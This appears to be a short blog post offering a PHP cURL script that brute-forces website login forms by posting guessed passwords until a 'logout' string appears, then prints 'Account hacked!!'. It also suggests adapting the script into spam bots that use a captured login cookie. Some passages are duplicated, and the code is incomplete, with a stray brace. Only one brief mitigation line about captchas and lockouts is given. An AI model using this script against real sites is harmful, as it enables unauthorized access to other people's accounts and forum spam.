THIS TUTORIAL IS JUST FOR EDUCATIONAL PURPOSES
Guys, I wanna show a simple bruteforce script in PHP using CURL. This script can be used for hacking any passwords with weaker security (i.e.) If that website isnt having captcha or it doesnt limit number of login attempts.
Assumptions:
1. After logging in, the user might see some text like "logout"
-----------------------------------------------------------------------
This technique can also be used for creating auto spamming bots, in forms, forums etc., If login is required for spamming, use the following line:
curl_setopt($ch, CURLOPT_COOKIEFILE, '/cookie.txt');
Where cookie.txt contains the success login account's cookie for that website!!
To evade these types of attacks, you can use a captcha or you can block the user if he tries wrong password for X times.
Assumptions:
1. After logging in, the user might see some text like "logout"
-----------------------------------------------------------------------
-----------------------------------------------------------------------
<?php
set_time_limit(0);
$url="URL_To_ATTACK";
/*
Write your own block to generate all possible strings that you wish to try using for loops and then generate $pass variable which you want to try
*/
echo "Trying {$pass}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=XXX&password={$pass}");
$output = curl_exec($ch);
curl_close($ch);
if(strstr($output,"logout"))
{
echo "Account hacked!!";
break;
}
}
?>
This technique can also be used for creating auto spamming bots, in forms, forums etc., If login is required for spamming, use the following line:
curl_setopt($ch, CURLOPT_COOKIEFILE, '/cookie.txt');
Where cookie.txt contains the success login account's cookie for that website!!
To evade these types of attacks, you can use a captcha or you can block the user if he tries wrong password for X times.
No comments:
Post a Comment